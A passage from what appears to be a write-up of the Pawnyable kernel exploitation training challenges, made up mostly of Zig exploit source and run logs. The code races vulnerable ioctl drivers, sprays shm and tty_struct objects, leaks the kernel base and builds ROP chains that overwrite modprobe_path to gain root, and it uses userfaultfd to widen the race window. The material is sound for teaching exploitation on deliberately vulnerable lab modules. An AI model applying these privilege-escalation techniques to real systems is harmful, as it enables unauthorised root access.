           std.log.info("Won the race", .{});
           race_is_won.* = true;
       }
       
       fn raceCorrupt(dst: *request_t, len: usize, are_we_there_yet: *bool) void {
           while (!are_we_there_yet.*) {
               std.Thread.sleep(2);
               dst.*.len = len;
           }
       }
       
       fn overwrite(fd: posix.fd_t, buf: []u8) !void {
           std.debug.assert(try std.Thread.getCpuCount() > 1);
           std.debug.assert(buf.len >= 32);
       
           var req: request_t = undefined;
           var race_is_won = false;
       
           var t1 = try std.Thread.spawn(.{}, raceIoctl, .{fd, buf, .SET, &req, &race_is_won});
           var t2 = try std.Thread.spawn(.{}, raceCorrupt, .{&req, buf.len, &race_is_won});
           try pinThreadToCore(t1.getHandle(), 0);
           try pinThreadToCore(t2.getHandle(), 1);
           t1.join();
           t2.join();
       }
       
       fn overread(fd: posix.fd_t, buf: []u8) !void {
           std.debug.assert(try std.Thread.getCpuCount() > 1);
           std.debug.assert(buf.len >= 32);
       
           var req: request_t = undefined;
           var race_is_won = false;
       
           var t1 = try std.Thread.spawn(.{}, raceIoctl, .{fd, buf, .GET, &req, &race_is_won});
           var t2 = try std.Thread.spawn(.{}, raceCorrupt, .{&req, buf.len, &race_is_won});
           try pinThreadToCore(t1.getHandle(), 0);
           try pinThreadToCore(t2.getHandle(), 1);
           t1.join();
           t2.join();
       }
       const shm_c = @cImport({
           @cInclude("sys/shm.h");
           @cInclude("sys/ipc.h");
           @cInclude("sys/types.h");
       });
       
       const ShmInfo = struct {
           segment: c_int,
           addr: *const anyopaque,
       };
       
       fn shmSpray(shms: []ShmInfo) !void {
           for (shms) |*shm| {
               const shmId = shm_c.shmget(shm_c.IPC_PRIVATE, std.heap.page_size_min, shm_c.IPC_CREAT | 0o666);
               switch (posix.errno(shmId)) {
                   .SUCCESS => {},
                   else => |err| return posix.unexpectedErrno(err),
               }
               shm.* = .{ .segment = shmId, .addr = shm_c.shmat(shmId, null, shm_c.SHM_RDONLY).? };
           }
       }
       fn shmFree(shms: []ShmInfo) void {
           for (shms) |shm| {
               switch (posix.errno(shm_c.shmctl(shm.segment, shm_c.IPC_RMID, null))) {
                   .SUCCESS => {},
                   else => |_| {},
               }
               switch (posix.errno(shm_c.shmdt(shm.addr))) {
                   .SUCCESS => {},
                   else => |_| {},
               }
           }
       }
       var ADD_RSP_0xb8_POP_R13_POP_R14_POP_R15_POP_RBP: u64 = 0xffffffff811481c6;
       
       var POP_RDX_POP_RSI_POP_RDI_POP_RBP: u64 = 0xffffffff810012c1;
       var POP_R10_POP_RBP: u64 = 0xffffffff81384eec;
       var ADD_ADDROF_RSI_RDX: u64 = 0xffffffff81399ff3;
       
       var SYSCALL_RETURN_VIA_SYSRET: u64 = 0xffffffff818000fb; // similar to but not exactly the same as KPTI_TRAMPOLINE
       var MODPROBE_PATH: u64 = 0xffffffff81e37e60;
       
       inline fn ropchain(fd: posix.fd_t) void {
           const modprobe_difference: u64 = @bitCast(-@as(i64, @intCast(std.mem.bytesToValue(u64, "/sbin/m") - std.mem.bytesToValue(u64, "/tmp/x\x00"))));
           // we don't control the return address (rcx) so this will segfault once we return to userspace (importantly, this will not cause a kernel panic)
            // when stuffing a ropchain in pt_regs this is a big advantage over commit_creds(&init_cred), which requires a clean userspace return
           asm volatile (""
               :
               : [_] "{r15}" (POP_RDX_POP_RSI_POP_RDI_POP_RBP),
                 [_] "{r14}" (modprobe_difference),
                 [_] "{r13}" (MODPROBE_PATH),
                 // [junk] "{r12}" (),
                 [_] "{rbx}" (POP_R10_POP_RBP),
                 // [junk] "{r10}" (),
                 [_] "{r9}" (ADD_ADDROF_RSI_RDX),
                 [_] "{r8}" (SYSCALL_RETURN_VIA_SYSRET),
           );
       
           _ = @call(.always_inline, linux.syscall3, .{ linux.SYS.lseek, @as(usize, @bitCast(@as(isize, fd))), 1, linux.SEEK.CUR });
       }
       
       fn adjust_offsets(kaslr_offset: u64) void {
           const gadgets = &[_]*u64{
               &ADD_RSP_0xb8_POP_R13_POP_R14_POP_R15_POP_RBP,
               &POP_RDX_POP_RSI_POP_RDI_POP_RBP,
               &POP_R10_POP_RBP,
               &ADD_ADDROF_RSI_RDX,
       
               &SYSCALL_RETURN_VIA_SYSRET,
               &MODPROBE_PATH,
           };
           for (gadgets) |g| {
               g.* += kaslr_offset;
           }
       }
       <<pawnyable-lib>>
       <<lk03-types>>
       <<lk03-race>>
       <<lk03-shm>>
       <<lk03-ropchain>>
       
       fn spray(fds: []posix.fd_t) !void {
           for (0..fds.len) |i| {
               fds[i] = try posix.open("/proc/self/stat", .{ .ACCMODE = .RDONLY }, 0o660);
           }
       }
       
       pub fn main() !void {
           const fd = try posix.open("/dev/dexter", .{ .ACCMODE = .RDWR }, 0o660);
           defer posix.close(fd);
       
           var shm_addrs: [100]ShmInfo = undefined;
           try shmSpray(&shm_addrs);
       
           var buf: [32+32*2]u8 = undefined;
           try overread(fd, &buf);
       
           const init_ipc_ns: u64 = 0xffffffff81eb2c00;
           const kaslr_offset = std.mem.readInt(u64, buf[buf.len-32..][@offsetOf(shm_file_data, "ns")..][0..8], .little) - init_ipc_ns;
           std.log.info("Kernel base at 0x{x}", .{0xffffffff81000000 + kaslr_offset});
           adjust_offsets(kaslr_offset);
       
           shmFree(&shm_addrs);
       
           var stat_fds: [1000]posix.fd_t = undefined;
           try spray(&stat_fds);
           defer for (stat_fds) |sfd| posix.close(sfd);
       
           @memcpy(buf[32+32..][@offsetOf(seq_operations, "start")..][0..8], std.mem.asBytes(&ADD_RSP_0xb8_POP_R13_POP_R14_POP_R15_POP_RBP));
           try overwrite(fd, &buf);
       
           for (stat_fds) |sfd| {
               ropchain(sfd);
           }
           // let it crash!
       }
       whoami
       ./exploit
       echo '#!/bin/sh\n/usr/bin/whoami &> /tmp/whoisit\nchmod 777 /tmp/whoisit' > /tmp/x
       chmod 777 /tmp/x
       touch /tmp/unknown
       chmod 777 /tmp/unknown
       /tmp/unknown &> /tmp/null
       cat /tmp/whoisit
       whoami: unknown uid 1337
       [INFO] Won the race
       [INFO] Kernel base at 0xffffffff8e400000
       [INFO] Won the race
       Segmentation fault
       root
       
  (DIR) Full exploit

        Having the exploit die with a segfault is a bit hacky, but in the end we got our privilege escalation.
       
       == Fleckvieh
       
       
        Challenge info
       [*] './fleckvieh/qemu/rootfs/root/fleckvieh.ko'
           Arch:       amd64-64-little
           RELRO:      No RELRO
           Stack:      No canary found
           NX:         NX enabled
           PIE:        No PIE (0x0)
           Stripped:   No
       sed -i -E "s|^(echo 2 > /proc/sys/kernel/kptr_restrict)|# \1|" rootfs/etc/init.d/S99pawnyable
       sed -i -E "s|^(echo 1 > /proc/sys/kernel/dmesg_restrict)|# \1|" rootfs/etc/init.d/S99pawnyable
       sed -i -E "s/(setuidgid) 1337 (sh)/\1 0 \2/" rootfs/etc/init.d/S99pawnyable
       
       sed -i '/${DEBUG:+ -s} \\/d' run.sh
       sed -i -E '/qemu-system-x86_64 \\/a \ \ \ \ ${DEBUG:+ -s} \\' run.sh
       sed -i -E 's/ kaslr/ ${NOKASLR:+no}kaslr/' run.sh
       sed -i '/-serial unix:vm.sock,server,nowait/d' run.sh
       sed -i -E '/-monitor \/dev\/null/a \ \ \ \ -serial unix:vm.sock,server,nowait \\' run.sh
       SMEP enabled
       SMAP enabled
       KPTI enabled
       KASLR enabled
       
        Well, this is a perfectly ordinary race condition.
       
        1.  Inside `blob_get` or `blob_set`, `blob_list *victim = blob_find_by_id(...)` runs
        2.  Another thread runs `blob_del`, freeing the blob that `victim` points to
        3.  Heap spray
        4.  By the time `copy_to_user`/`copy_from_user` runs, `victim->data` (now a dangling pointer) points to a kernel structure of our choosing; we now have AAR/AAW
       const fleckvieh = struct {
           pub const ops = enum(u32) {
               ADD = 0xf1ec0001,
               DEL = 0xf1ec0002,
               GET = 0xf1ec0003,
               SET = 0xf1ec0004,
           };
           pub fn ioctl(fd: posix.fd_t, op: ops, buf: ?[]u8, id: ?i32) !i32 {
               if (op != .ADD and id == null) return error.InvalidArgument;
               const ret = linux.ioctl(fd, @intFromEnum(op), @intFromPtr(&request_t{ .id = id orelse undefined, .size = if (buf) |b| b.len else undefined, .data = if ...
       
               switch (posix.errno(ret)) {
                   .SUCCESS => return @intCast(@as(i64, @bitCast(ret))),
                   else => |e| return posix.unexpectedErrno(e),
               }
           }
       };
       
       
       const request_t = extern struct {
           id: i32,
           size: usize,
           data: [*]u8,
       };
       
       const blob_list = extern struct {
           const struct_head = extern struct {
               next: *struct_head,
               prev: *struct_head,
           };
       
           id: i32,
           size: usize,
           data: [*]u8,
           list: struct_head,
       };
       
        But the window for exploiting the race (between `blob_find_by_id` and `copy_from_user`) is too short.
        Here are two ways to buy time: userfaultfd and FUSE.
       
       === userfaultfd
       
       
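        userfaultfd lets page faults be handled in user space.
        You are probably asking, "What is that good for?"
        There are surely some legitimate use cases, but for pwn its value is that it can stall a kernel thread.
        Because this is so easy to abuse, the feature (specifically, handling page faults that originate in kernel space) became a privileged operation in Linux 5.2. [^fn:7]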
       
        First, let's implement the userfaultfd hello world [5].
       <<pin-to-core>>
       
       const userfaultfd = struct {
           pub const msg = packed struct {
               pub const EVENT = enum(u8) {
                   PAGEFAULT = 0x12,
                   FORK,
                   REMAP,
                   REMOVE,
                   UNMAP,
               };
               event: EVENT,
       
               _reserved1: u8,
               _reserved2: u16,
               _reserved3: u32,
       
               arg: packed union {
                   pagefault: packed struct {
                       pub const FLAG = packed struct (u64) {
                           WRITE: bool = false,
                           WP: bool = false,
                           MINOR: bool = false,
                           _: u61 = 0,
                       };
       
                       flags: FLAG,
                       address: u64,
                       feat: packed union { ptid: u32 },
                   },
                   fork: packed struct { ufd: u32 },
                   remap: packed struct {
                       from: u64,
                       to: u64,
                       len: u64,
                   },
                   remove: packed struct {
                       start: u64,
                       end: u64,
                   },
                   _reserved: packed struct {
                       _reserved1: u64,
                       _reserved2: u64,
                       _reserved3: u64,
                   },
               },
           };
       
           const uffdio_api = extern struct {
               pub const FEATURE = packed struct (u64) {
                   PAGEFAULT_FLAG_WP: bool = false,
                   EVENT_FORK: bool = false,
                   EVENT_REMAP: bool = false,
                   EVENT_REMOVE: bool = false,
                   MISSING_HUGETLBFS: bool = false,
                   MISSING_SHMEM: bool = false,
                   EVENT_UNMAP: bool = false,
                   SIGBUS: bool = false,
                   THREAD_ID: bool = false,
                   MINOR_HUGETLBFS: bool = false,
                   MINOR_SHMEM: bool = false,
                   _: u53 = 0,
               };
       
               api: u64,
               features: FEATURE,
               ioctls: u64,
           };
           const uffdio_range = extern struct {
               start: u64,
               len: u64,
           };
           const uffdio_register = extern struct {
               pub const MODE = packed struct (u64) {
                   MISSING: bool = false,
                   WP: bool = false,
                   MODE_MINOR: bool = false,
                   _: u61 = 0,
               };
       
               range: uffdio_range,
               mode: MODE,
               ioctls: u64,
           };
           const uffdio_copy = extern struct {
               pub const MODE = packed struct (u64) {
                   DONTWAKE: bool = false,
                   WP: bool = false,
                   _: u62 = 0,
               };
       
               dst: u64,
               src: u64,
               len: u64,
               mode: MODE,
               copy: i64,
           };
           const uffdio_zeropage = extern struct {
               pub const MODE = packed struct (u64) {
                   DONTWAKE: bool = false,
                   _: u63 = 0,
               };
       
               range: uffdio_range,
               mode: MODE,
               zeropage: i64,
           };
           const uffdio_writeprotect = extern struct {
               pub const MODE = packed struct (u64) {
                   WP: bool = false,
                   DONTWAKE: bool = false,
                   _: u62 = 0,
               };
       
               range: uffdio_range,
               mode: MODE,
           };
           const uffdio_continue = extern struct {
               pub const MODE = packed struct (u64) {
                   DONTWAKE: bool = false,
                   _: u63 = 0,
               };
       
               range: uffdio_range,
               mode: MODE,
               mapped: i64,
           };
       
           const UFFD_API: u64 = 0xaa;
           const UFFDIO = enum(u32) {
               const _uffdio = 0xaa;
               const ioctl = linux.IOCTL;
       
               API = ioctl.IOWR(_uffdio, 0x3f, uffdio_api),
               REGISTER = ioctl.IOWR(_uffdio, 0x00, uffdio_register),
               UNREGISTER = ioctl.IOR(_uffdio, 0x01, uffdio_range),
               WAKE = ioctl.IOR(_uffdio, 0x02, uffdio_range),
               COPY = ioctl.IOWR(_uffdio, 0x03, uffdio_copy),
               ZEROPAGE = ioctl.IOWR(_uffdio, 0x04, uffdio_zeropage),
               WRITEPROTECT = ioctl.IOWR(_uffdio, 0x06, uffdio_writeprotect),
               CONTINUE = ioctl.IOWR(_uffdio, 0x07, uffdio_continue),
           };
       
       
           pub fn register(region: []u8, comptime fault_handler: anytype, fh_args: anytype) !void {
               const fd: posix.fd_t = blk: {
                   const err = linux.syscall1(linux.syscalls.X64.userfaultfd, @as(u32, @bitCast(linux.O{ .CLOEXEC = true, .NONBLOCK = true })));
                   switch (linux.E.init(err)) {
                       .SUCCESS => break :blk @intCast(err),
                       else => |e| return posix.unexpectedErrno(e),
                   }
               };
       
               var ufapi = uffdio_api{ .api = UFFD_API, .features = .{}, .ioctls = undefined };
               switch (posix.errno(linux.ioctl(fd, @intFromEnum(UFFDIO.API), @intFromPtr(&ufapi)))) {
                   .SUCCESS => {},
                   else => |err| return posix.unexpectedErrno(err),
               }
       
               var ufreg = uffdio_register{ .range = .{ .start = @intFromPtr(@as([*]u8, @ptrCast(region))), .len = region.len }, .mode = .{ .MISSING = true }, .ioctls ...
               switch (posix.errno(linux.ioctl(fd, @intFromEnum(UFFDIO.REGISTER), @intFromPtr(&ufreg)))) {
                   .SUCCESS => {},
                   else => |err| return posix.unexpectedErrno(err),
               }
       
               var t = try std.Thread.spawn(.{}, fault_handler, .{fd} ++ fh_args);
               try pinThreadToCore(t.getHandle(), 0);
               t.detach();
           }
       };
       
       
       fn testFaultHandler(fd: posix.fd_t) void {
           const ufd = userfaultfd;
           const S = struct {
               var msg: ufd.msg = undefined;
               var fault_count: u32 = 0;
           };
       
           const page = posix.mmap(
               null,
               0x1000,
               linux.PROT.READ | linux.PROT.WRITE,
               posix.MAP{ .TYPE = .PRIVATE, .ANONYMOUS = true },
               -1,
               0,
           ) catch {
               std.log.err("mmap failed", .{});
               return;
           };
           defer posix.munmap(page);
       
           std.log.info("Waiting for page fault...", .{});
           var pollfds = [_]posix.pollfd{
               .{ .fd = fd, .events = posix.POLL.IN, .revents = undefined }
           };
           while (true) {
               _ = posix.poll(&pollfds, -1) catch break;
               const pollfd = pollfds[0];
       
               const err_mask = posix.POLL.ERR | posix.POLL.HUP;
               if (pollfd.revents & err_mask != 0) {
                   std.log.err("poll failed", .{});
                   return;
               }
       
               _ = posix.read(fd, std.mem.asBytes(&S.msg)) catch {
                   std.log.err("read failed", .{});
                   return;
               };
       
               const pagefault_event = switch (S.msg.event) {
                   .PAGEFAULT => S.msg.arg.pagefault,
                   else => {
                       std.log.err("Received non-pagefault event", .{});
                       return;
                   },
               };
       
               std.log.info("pagefault_event.flags = {any}", .{pagefault_event.flags});
               std.log.info("pagefault_event.addr = 0x{x}", .{pagefault_event.address});
       
               @memcpy(page[0..9], if (S.fault_count % 2 == 0) "Test (0)\x00" else "Test (1)\x00");
               S.fault_count += 1;
       
               var ufcopy = ufd.uffdio_copy{ .src = @intFromPtr(@as([*]u8, @ptrCast(page))), .dst = pagefault_event.address & ~@as(u64, 0xfff), .len = page.len, .mode = ...
               switch (posix.errno(linux.ioctl(fd, @intFromEnum(ufd.UFFDIO.COPY), @intFromPtr(&ufcopy)))) {
                   .SUCCESS => {},
                   else => |err| {
                       std.log.err("{any}", .{err});
                       return;
                   },
               }
           }
       }
       <<pawnyable-lib>>
       <<lk04-userfaultfd>>
       
       pub fn main() !void {
           {
               var cpu: linux.cpu_set_t = @splat(0);
               cpu[0] = 1;
       
               try linux.sched_setaffinity(linux.getpid(), &cpu);
           }
       
           const page = try posix.mmap(
               null,
               0x2000,
               linux.PROT.READ | linux.PROT.WRITE,
               posix.MAP{ .TYPE = .PRIVATE, .ANONYMOUS = true },
               -1,
               0,
           );
           try userfaultfd.register(page, testFaultHandler, .{});
       
           var buf: [0x100]u8 = undefined;
           for (0..2) |_| {
               const buf_as_cstring: [*:0]const u8 = @ptrCast(&buf);
               @memcpy(&buf, page[0..0x100]);
               std.debug.print("0x0000: {s}\n", .{buf_as_cstring});
               @memcpy(&buf, page[0x1000..][0..0x100]);
               std.debug.print("0x1000: {s}\n", .{buf_as_cstring});
           }
       }
       [INFO] Waiting for page fault...
       [INFO] pagefault_event.flags = tmp.DprYUckmLc.userfaultfd.msg__union_24586__struct_24587.FLAG{ .WRITE = false, .WP = false, .MINOR = false, ._ = 0 }
       [INFO] pagefault_event.addr = 0x7f9577e2b000
       0x0000: Test (0)
       [INFO] pagefault_event.flags = tmp.DprYUckmLc.userfaultfd.msg__union_24586__struct_24587.FLAG{ .WRITE = false, .WP = false, .MINOR = false, ._ = 0 }
       [INFO] pagefault_event.addr = 0x7f9577e2c000
       0x1000: Test (1)
       0x0000: Test (0)
       0x1000: Test (1)
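
        Two small details in the listing above are easy to miss: the `packed struct (u64)` flag types are just the raw bit masks the kernel expects, and the handler rounds the faulting address down to its page before `UFFDIO_COPY`. A minimal sketch of both follows; `RegisterMode`, `rawBits` and `pageBase` are names made up for this example, and the 4 KiB page size is an assumption.

        ```zig
        const std = @import("std");

        // Same shape as the MODE type inside uffdio_register above:
        // each bool occupies one bit, starting from the least significant bit.
        const RegisterMode = packed struct(u64) {
            MISSING: bool = false,
            WP: bool = false,
            MODE_MINOR: bool = false,
            _: u61 = 0,
        };

        /// Reinterpret the packed struct as the raw u64 passed to the ioctl.
        fn rawBits(mode: RegisterMode) u64 {
            return @bitCast(mode);
        }

        /// Round a faulting address down to the start of its 4 KiB page.
        fn pageBase(addr: u64) u64 {
            return addr & ~@as(u64, 0xfff);
        }

        pub fn main() void {
            std.debug.print("MISSING      = 0x{x}\n", .{rawBits(.{ .MISSING = true })});
            std.debug.print("MISSING | WP = 0x{x}\n", .{rawBits(.{ .MISSING = true, .WP = true })});
            std.debug.print("page base    = 0x{x}\n", .{pageBase(0x7f9577e2b123)});
        }
        ```

        Writing the flags as named fields keeps the call sites readable (`.{ .MISSING = true }`) while still producing the same integer a C program would build with `|`.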
       
        `copy_to_user`/`copy_from_user` dereference their `to`/`from` argument first, so when that page is registered with userfaultfd, the malicious handler runs before any memory is copied.
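
        To make the ordering concrete, here is a toy user-space model of that race. It is only a sketch: `Slot`, `copyWithFault` and `reuseSlot` are hypothetical names, and the "fault" is an ordinary function call rather than a real page fault. The point is that whatever the handler does to the source object is what the copy ends up seeing.

        ```zig
        const std = @import("std");

        /// Toy stand-in for a kernel heap chunk that can be freed and reused.
        const Slot = struct {
            bytes: [8]u8,
        };

        /// Models copy_to_user(dst, src, n): touching the missing destination page
        /// runs the fault handler first, and only then is the data copied.
        fn copyWithFault(dst: []u8, src: *Slot, on_fault: *const fn (*Slot) void) void {
            on_fault(src); // the userfaultfd handler runs here
            @memcpy(dst, src.bytes[0..dst.len]); // the copy resumes afterwards
        }

        /// Stands in for "DEL the blob, then spray tty_struct into the same chunk".
        fn reuseSlot(slot: *Slot) void {
            slot.bytes = "TTYSTRUC".*;
        }

        pub fn main() void {
            var slot = Slot{ .bytes = "BLOBDATA".* };
            var out: [8]u8 = undefined;
            copyWithFault(&out, &slot, &reuseSlot);
            // The caller asked for the blob but receives the reused contents.
            std.debug.print("{s}\n", .{out[0..]});
        }
        ```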
       
       ROPchain
       grep /proc/kallsyms -e 'swapgs_restore_regs_and_return_to_usermode'
       ffffffff81800e10 T swapgs_restore_regs_and_return_to_usermode
       ropr --nosys --nojop -R '^(mov \[rax\], rdi|pop rax|pop rdi); ret;|^pop rsp; ret[^;]*?;' vmlinux
       0xffffffff8110850a: mov [rax], rdi; ret;
       0xffffffff811be9f4: pop rsp; ret 0x48b0;
       0xffffffff8126db98: pop rsp; ret 0xdc;
       0xffffffff813e525d: pop rsp; ret 0x7404;
       0xffffffff813e53bb: pop rsp; ret 0xf04;
       0xffffffff814a5527: pop rsp; ret 0x4d38;
       0xffffffff81c9cd9d: pop rsp; ret 0x4fff;
       0xffffffff81c9cda1: pop rsp; ret 0xefff;
       0xffffffff81ca6ca0: pop rax; ret;
       0xffffffff81ce088b: pop rdi; ret;
       0xffffffff81d8cf00: pop rsp; ret 1;
       0xffffffff81d962a4: pop rsp; ret;
       var PUSH_RDX_CMP_EAX_0x415b005c_POP_RSP_POP_RBP: u64 = 0xffffffff8109b13a;
       
       var MOV_ADDROF_RAX_RDI: u64 = 0xffffffff8110850a;
       var POP_RAX: u64 = 0xffffffff8125a664;
       var POP_RDI: u64 = 0xffffffff812a7d7c;
       
       var KPTI_TRAMPOLINE: u64 = 0xffffffff81800e10+22;
       var MODPROBE_PATH: u64 = 0xffffffff81e37ea0;
       
       fn ropchain(buf: []u8) !usize {
           const chain = [_]u64{
               0, // junk
               POP_RDI,
               std.mem.readInt(u64, "/tmp/x\x00\x00", .little),
               POP_RAX,
               MODPROBE_PATH,
               MOV_ADDROF_RAX_RDI,
       
               KPTI_TRAMPOLINE,
               0, // junk
               0, // junk
               @intFromPtr(&modprobePath),
               user_cs,
               user_rflags,
               user_rsp,
               user_ss,
           };
           @memcpy(buf[0..chain.len*@sizeOf(u64)], std.mem.asBytes(&chain));
           return std.mem.asBytes(&chain).len;
       }
       
       fn adjust_offsets(kaslr_offset: u64) void {
           const gadgets = &[_]*u64{
               &PUSH_RDX_CMP_EAX_0x415b005c_POP_RSP_POP_RBP,
       
               &MOV_ADDROF_RAX_RDI,
               &POP_RAX,
               &POP_RDI,
       
               &KPTI_TRAMPOLINE,
               &MODPROBE_PATH,
           };
           for (gadgets) |g| {
               g.* += kaslr_offset;
           }
       }
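
        The first three gadgets of `ropchain` amount to a single 8-byte store of the string `/tmp/x` over `modprobe_path`. The sketch below shows how that string becomes the `u64` loaded into `rdi`; `packPath` is a helper invented for this example and is not part of the exploit.

        ```zig
        const std = @import("std");

        /// Pack up to 8 bytes of `path` (zero padded) into the little-endian u64
        /// that a single `mov [rax], rdi` would store.
        fn packPath(path: []const u8) u64 {
            std.debug.assert(path.len <= 8);
            var bytes = [_]u8{0} ** 8;
            @memcpy(bytes[0..path.len], path);
            return std.mem.readInt(u64, &bytes, .little);
        }

        pub fn main() void {
            const value = packPath("/tmp/x");
            std.debug.print("rdi = 0x{x:0>16}\n", .{value});

            // Storing the value back in little-endian order yields the original
            // bytes, which is what ends up in memory at modprobe_path.
            var mem: [8]u8 = undefined;
            std.mem.writeInt(u64, &mem, value, .little);
            std.debug.print("memory = {s}\n", .{std.mem.sliceTo(&mem, 0)});
        }
        ```

        Because the path plus its terminator fits in 8 bytes, one store is enough; a longer path would need one `pop rdi` / `pop rax` / `mov` triple per 8-byte piece.
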
       <<pawnyable-lib>>
       <<lk04-types>>
       <<tty_struct>>
       <<lk04-userfaultfd>>
       <<lk04-ropchain>>
       
       const UAF = enum {
           AAR,
           AAW,
       };
       
       fn sprayFaultHandler(uffd: posix.fd_t, fd: posix.fd_t, ttys: []posix.fd_t, buf: []u8, id: *i32, uaf_type: *UAF) void {
           var pollfds = [_]posix.pollfd{
               .{ .fd = uffd, .events = posix.POLL.IN, .revents = undefined }
           };
       
           while (true) {
               _ = posix.poll(&pollfds, -1) catch break;
               const pollfd = pollfds[0];
       
               const err_mask = posix.POLL.ERR | posix.POLL.HUP;
               if (pollfd.revents & err_mask != 0) {
                   std.log.err("poll failed", .{});
                   return;
               }
       
               var msg: userfaultfd.msg = undefined;
               _ = posix.read(uffd, std.mem.asBytes(&msg)) catch {
                   std.log.err("read failed", .{});
                   return;
               };
       
               const pagefault_event = switch (msg.event) {
                   .PAGEFAULT => msg.arg.pagefault,
                   else => {
                       std.log.err("received non-pagefault event", .{});
                       return;
                   },
               };
       
       
               std.log.info("Beginning {s}", .{@tagName(uaf_type.*)});
               switch (uaf_type.*) {
                   .AAR => {},
                   .AAW => {
                       // we want to overwrite the data at the address `heap_leak' with malicious tty_operations structures
                       // but we cannot simply SET the contents of the tty_struct that `heap_leak' points to
                       // instead, we will free the aforementioned tty_struct(s) and spray tty_operations (by adding blobs with contents of `buf'), hoping that one will be placed at `heap_leak'
                       for (0..100) |_| {
                           _ = fleckvieh.ioctl(fd, .ADD, buf, null) catch |err| {
                               std.log.err("blob_add failed with {any}", .{err});
                               return;
                           };
                       }
                   },
               }
               _ = fleckvieh.ioctl(fd, .DEL, null, id.*) catch |err| {
                   std.log.err("blob_del failed with {any}", .{err});
                   return;
               };
       
               for (ttys) |*tty| {
                   tty.* = posix.open("/dev/ptmx", .{ .ACCMODE = .RDONLY, .NOCTTY = true }, 0o660) catch unreachable;
               }
       
               var ufcopy = userfaultfd.uffdio_copy{ .src = @intFromPtr(@as([*]u8, @ptrCast(buf))), .dst = pagefault_event.address, .len = std.heap.page_size_min, .mode = .{}, .copy = ...
               switch (posix.errno(linux.ioctl(uffd, @intFromEnum(userfaultfd.UFFDIO.COPY), @intFromPtr(&ufcopy)))) {
                   .SUCCESS => {},
                   else => |err| {
                       std.log.err("{any}", .{err});
                       return;
                   },
               }
           }
       }
       
       fn exploit(fd: posix.fd_t) !void {
           var ttys: [10]posix.fd_t = undefined;
           var buf: [1024]u8 = undefined;
           var id: i32 = undefined;
           var uaf_type: UAF = undefined;
       
       
           const faultable_pages = try posix.mmap(
               null,
               3*std.heap.page_size_min, // 3 UAFs
               linux.PROT.READ | linux.PROT.WRITE,
               posix.MAP{ .TYPE = .PRIVATE, .ANONYMOUS = true },
               -1,
               0,
           );
           defer posix.munmap(faultable_pages);
           try userfaultfd.register(faultable_pages, sprayFaultHandler, .{fd, &ttys, &buf, &id, &uaf_type});
       
       
           const kaslr_offset = blk: {
               defer for (ttys) |tty| posix.close(tty);
               id = try fleckvieh.ioctl(fd, .ADD, &buf, null);
               uaf_type = .AAR;
                // trigger a page fault and leak the pointer stored in `tty_struct.ops'
                // copy_to_user may read the first bytes from the heap before its first write to `faultable_pages' faults,
                // and the UAF only happens inside that fault. To ensure the bytes containing `tty_struct.ops' are not
                // read before copy_to_user touches `faultable_pages', we must make a smaller (0x20-byte) request.
               _ = try fleckvieh.ioctl(fd, .GET, faultable_pages[0..0x20], id);
       
               const ptmx_fops_addr: u64 = 0xffffffff81c3c3c0;
               break :blk std.mem.bytesAsValue(u64, faultable_pages[@offsetOf(tty_struct, "ops")..][0..@sizeOf(@FieldType(tty_struct, "ops"))]).* - ptmx_fops_addr;
           };
           adjust_offsets(kaslr_offset);
           std.log.info("Kernel base @ 0x{x}", .{0xffffffff81000000+kaslr_offset});
       
       
           const heap_leak = blk: {
               defer for (ttys) |tty| posix.close(tty);
               id = try fleckvieh.ioctl(fd, .ADD, &buf, null);
               uaf_type = .AAR;
               _ = try fleckvieh.ioctl(fd, .GET, faultable_pages[std.heap.page_size_min..][0..1024], id);
       
               const offset = @offsetOf(tty_struct, "ldisc_sem") + @offsetOf(@FieldType(tty_struct, "ldisc_sem"), "read_wait");
               break :blk std.mem.bytesAsValue(u64, faultable_pages[std.heap.page_size_min..][offset..][0..8]).* - offset;
           };
           std.log.info("Heap leak = 0x{x}", .{heap_leak});
       
           {
               @memcpy(buf[0..1024], faultable_pages[std.heap.page_size_min..][0..1024]);
               const tty = std.mem.bytesAsValue(tty_struct, &buf);
               tty.*.magic = 0x5401;
               tty.*.kref = 0;
               tty.*.dev = 0;
               tty.*.driver = heap_leak;
               tty.*.ops = heap_leak+0x100;
       
               // ensure ropchain is far away enough from important tty_struct internals
               @memcpy(buf[0x100..][0..@sizeOf(tty_operations)], std.mem.asBytes(&tty_operations{ .ioctl = PUSH_RDX_CMP_EAX_0x415b005c_POP_RSP_POP_RBP }));
               _ = try ropchain(buf[0x100..][@sizeOf(tty_operations)..]);
       
               id = try fleckvieh.ioctl(fd, .ADD, &buf, null);
               uaf_type = .AAW;
               _ = try fleckvieh.ioctl(fd, .SET, faultable_pages[2*std.heap.page_size_min..][0..1024], id);
           }
       
           for (ttys) |tty| _ = linux.ioctl(tty, 0xdeadbeef, heap_leak+0x100+@sizeOf(tty_operations));
       }
       
       pub fn main() !void {
           {
               var cpu: linux.cpu_set_t = @splat(0);
               cpu[0] = 1;
               try linux.sched_setaffinity(linux.getpid(), &cpu);
           }
           catchSigsegv(&modprobePath);
           saveState();
       
           const fd = try posix.open("/dev/fleckvieh", .{ .ACCMODE = .RDWR }, 0o660);
           defer posix.close(fd);
       
           try exploit(fd);
       }
       user
       [INFO] Beginning AAR
       [INFO] Kernel base @ 0xffffffffb0800000
       [INFO] Beginning AAR
       [INFO] Heap leak = 0xffff9635433f4400
       [INFO] Beginning AAW
       [INFO] You won!!
       root
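
        The `Kernel base` line in the log is plain subtraction: the leaked `tty_struct.ops` pointer minus its link-time address gives the KASLR slide, which is then added to every gadget. A worked sketch follows; the constants are taken from the listings above, while `leaked_ops` is a hypothetical value chosen to reproduce the base printed in this run.

        ```zig
        const std = @import("std");

        // Link-time addresses taken from the listings above.
        const KERNEL_BASE: u64 = 0xffffffff81000000;
        const PTMX_FOPS: u64 = 0xffffffff81c3c3c0;
        const POP_RDI: u64 = 0xffffffff812a7d7c;

        /// KASLR slide = leaked runtime pointer - its link-time address.
        fn kaslrOffset(leaked_ops: u64) u64 {
            return leaked_ops - PTMX_FOPS;
        }

        pub fn main() void {
            // Hypothetical leak, chosen to match the "Kernel base" line in the log.
            const leaked_ops: u64 = 0xffffffffb143c3c0;
            const off = kaslrOffset(leaked_ops);
            std.debug.print("slide       = 0x{x}\n", .{off});
            std.debug.print("kernel base = 0x{x}\n", .{KERNEL_BASE + off});
            std.debug.print("pop rdi     = 0x{x}\n", .{POP_RDI + off});
        }
        ```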
       
  (DIR) Full exploit
       
        Nice.
       
       === FUSE
       
       
        FUSE lets you implement a filesystem in user space.
        Well, what matters for our purposes is that an arbitrary handler of ours runs whenever a certain file is accessed.
       
        As with userfaultfd, let's start by implementing a simple program.
